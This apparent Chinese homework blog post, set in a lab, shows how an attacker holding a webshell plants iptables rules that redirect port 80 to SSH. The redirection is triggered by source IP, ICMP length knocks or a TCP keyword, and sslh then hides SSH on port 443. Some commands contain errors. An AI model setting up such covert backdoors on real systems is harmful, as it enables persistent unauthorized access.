iptables端口复用+sslh隐藏端口

asl404

已于 2023-02-07 17:04:25 修改

阅读量411

点赞数

分类专栏：作业文章标签：安全 Powered by 金山文档

于 2023-02-06 19:05:53 首次发布

本文链接：https://blog.csdn.net/asl404/article/details/128906701

版权

作业专栏收录该内容

10 篇文章 0 订阅

订阅专栏

文章详细介绍了如何在Linux环境中利用iptables的端口复用技术，包括通过源地址重定向、ICMP协议和TCP数据包关键字来实现对22端口的访问。此外，还提到了使用SSLH隐藏SSH端口，使HTTPS和SSH能共享同一443端口的方法。

摘要由CSDN通过智能技术生成

环境：

攻击主机：Kali -- 192.168.218.135

目标主机：RHEL8 -- 192.168.218.129

什么是端口复用

端口复用是指不同的应用程序使用相同端口使用相同端口进行通讯

场景

目标主机是Linux系统，目标主机防火墙有严格的限制，只允许80端口的流量进入。我们拿到了目标主机的Webshell并且拿到了SSH的账号密码。但是我们不能通过22端口远程连接，必须得利用80端口做端口复用连接。

现在我们的思路就是利用Linux的iptables防火墙的nat表的PREROUTING 链做端口复用，因为nat 表的 PREROUTING 链会在路由决策之前被处理。

方法一：根据源地址做端口复用

将来自192.168.218.135的访问80端口的流量都重定向到22端口

[root@localhost ~]# iptables -t nat -A PREROUTING -p tcp -s 192.168.218.135 --dport 80 -j REDIRECT --to-port 22

连接目标主机的80端口将会被重定向到22端口

┌──(root㉿kali)-[~]
└─# ssh root@192.168.218.129 -p 80
The authenticity of host '[192.168.218.129]:80 ([192.168.218.129]:80)' can't be established.
ED25519 key fingerprint is SHA256:Xyl+VWFSAPsWpBdCAW3pJSxbbajvRsoVvfqXavSa6fA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.218.129]:80' (ED25519) to the list of known hosts.
root@192.168.218.129's password: 
Activate the web console with: systemctl enable --now cockpit.socket

Register this system with Red Hat Insights: insights-client --register
Create an account or view all your systems at https://red.ht/insights-dashboard
Last login: Thu Feb  2 09:10:41 2023 from 192.168.218.1
[root@localhost ~]#

这样搞当我们访问目标主机80端口时候的所有的流量都会被转发给22端口，网页可能就打不开了哈哈。如果我们不用访问该HTTP服务的话，还行。适用于VPS连接

方法二：利用ICMP协议做遥控开关

创建端口复用链

[root@localhost ~]# iptables -t nat -N LETMEIN

创建端口复用规则，将流量转发给22端口

[root@localhost ~]# iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22

开启开关，如果接受到一个长为1139的ICMP包，则将源IP添加到letmein中

[root@localhost ~]# iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1139 -m recent --set --name letmein --rsource -j ACCEPT

关闭开关，如果接收到一个长为 1140 的 ICMP 包，则将源 IP 从 letmein 中去掉

[root@localhost ~]# iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1140 -m recent --name letmein --remove -j ACCEP

如果发现 SYN 包的来源 IP 处于 letmein 列表中，将跳转到 LETMEIN 链进行处理，有效时间为 3600 秒

[root@localhost ~]# iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN

开启复用，向目标发送一个长度为1111的ICMP数据包（加上IP的包头20位和ICMP包头的8位实际位数位1139）

┌──(root㉿kali)-[~]
└─# ssh root@192.168.218.129
ssh: connect to host 192.168.218.129 port 22: Connection timed out

┌──(root㉿kali)-[~]
└─# ping -c 1 -s 1111 192.168.218.129
PING 192.168.218.129 (192.168.218.129) 1111(1139) bytes of data.
1119 bytes from 192.168.218.129: icmp_seq=1 ttl=64 time=0.826 ms

--- 192.168.218.129 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.826/0.826/0.826/0.000 ms

┌──(root㉿kali)-[~]
└─# ssh root@192.168.218.129 -p 80
The authenticity of host '[192.168.218.129]:80 ([192.168.218.129]:80)' can't be established.
ED25519 key fingerprint is SHA256:Xyl+VWFSAPsWpBdCAW3pJSxbbajvRsoVvfqXavSa6fA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.218.129]:80' (ED25519) to the list of known hosts.
root@192.168.218.129's password: 
Activate the web console with: systemctl enable --now cockpit.socket

Register this system with Red Hat Insights: insights-client --register
Create an account or view all your systems at https://red.ht/insights-dashboard
Last login: Thu Feb  2 09:10:41 2023 from 192.168.218.1
[root@localhost ~]#

关闭复用向目标发送一个长度为1112的ICMP数据包

┌──(root㉿kali)-[~]
└─# ping -c 1 -s 1112 192.168.218.129
PING 192.168.218.129 (192.168.218.129) 1112(1140) bytes of data.
1120 bytes from 192.168.218.129: icmp_seq=1 ttl=64 time=0.377 ms
 
--- 192.168.218.129 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.377/0.377/0.377/0.000 ms

该方法的缺点是，如果目标在内网，我们无法直接ping

方法三：利用TCP协议做遥控开关

利用 tcp 数据包中的关键字做遥控开关，不怕目标在内网。

创建端口复用链

[root@localhost ~]# iptables -t nat -N LETMEIN

创建端口复用规则，将流量转发给22端口

[root@localhost ~]# iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22

开启开关如果接收到一个含有zhimakaimen的TCP包，则将来源 IP 添加到加为letmein的列表中

[root@localhost ~]# iptables -A INPUT -p tcp -m string --string 'zhimakaimen' --algo bm -m recent --set --name letmein --rsource -j ACCEPT

关闭开关，如果接收到一个含有threathunterleaving的TCP包，则将来源 IP 从letmein的列表中移除

[root@localhost ~]# iptables -A INPUT -p tcp -m string --string ‘threathunterleaving’ --algo bm -m recent --name letmein --remove -j ACCEPT

如果发现 SYN 包的来源 IP 处于 letmein 列表中，将跳转到 LETMEIN 链进行处理，有效时间为 3600 秒

[root@localhost ~]# iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN

开启复用，开启后本机到目标80端口的流量将转发至目标的SSH

┌──(root㉿kali)-[~]
└─# echo zhimakaimen | socat - tcp:192.168.218.129:80

关闭复用，80端口恢复正常

──(root㉿kali)-[~]
└─# echo bagalalu | socat - tcp:192.168.218.129:80

sslh隐藏端口

环境：Kali

隐藏端口

通过端口复用来达到隐藏端口的目的。这里以隐藏SSH端口，通过SSH进行远程登录为例，通过SSLH让 HTTPS 和 SSH 共享同一个端口

下载sslh

┌──(root㉿kali)-[~]
└─ apt-get install sslh -y

配置sslh

# Default options for sslh initscript
# sourced by /etc/init.d/sslh

# binary to use: forked (sslh) or single-thread (sslh-select) version
# systemd users: don't forget to modify /lib/systemd/system/sslh.service
DAEMON=/usr/sbin/sslh

DAEMON_OPTS="--user sslh --listen <change-me>:443 --ssh 127.0.0.1:22 --ssl 127.0.0.1:443 --pidfile /var/run/sslh/sslh.pid"

#修改为

DAEMON_OPTS="--user sslh --listen 0.0.0.0:443 --ssh 127.0.0.1:22 --ssl 127.0.0.1:443 --pidfile /var/run/sslh/sslh.pid"

启动SSLH

┌──(root㉿kali)-[~]
└─ systemctl enable sslh
Synchronizing state of sslh.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable sslh
Created symlink /etc/systemd/system/multi-user.target.wants/sslh.service → /lib/systemd/system/sslh.service.  
测试，检查 SSLH 守护程序是否正在监听 443

┌──(root㉿kali)-[~]
└─ ps -ef | grep sslh
sslh     1093888       1  0 12:13 ?        00:00:00 /usr/sbin/sslh --foreground --user sslh --listen 0.0.0.0 443 --ssh 127.0.0.1 22 --tls 127.0.0.1 443 --pidfile /var/run/sslh/sslh.pid
sslh     1093890 1093888  0 12:13 ?        00:00:00 /usr/sbin/sslh --foreground --user sslh --listen 0.0.0.0 443 --ssh 127.0.0.1 22 --tls 127.0.0.1 443 --pidfile /var/run/sslh/sslh.pid
root     1094656 1094630  0 12:15 pts/2    00:00:00 grep --color=auto sslh

利用

[root@localhost ~] ssh -p 443 root@192.168.218.135
The authenticity of host '[192.168.218.135]:443 ([192.168.218.135]:443)' can't be established.
ECDSA key fingerprint is SHA256:nWuRpxRY+eRmSjDLm/PTvsyEyFVbQMyQfegunja7Z4k.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.218.135]:443' (ECDSA) to the list of known hosts.
root@192.168.218.135's password: 
Linux kali 5.18.0-kali5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 5.18.5-1kali6 (2022-07-07) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb  2 12:15:30 2023 from 192.168.218.1
┌──(root㉿kali)-[~]
└─ uname -srm            
Linux 5.18.0-kali5-amd64 x86_64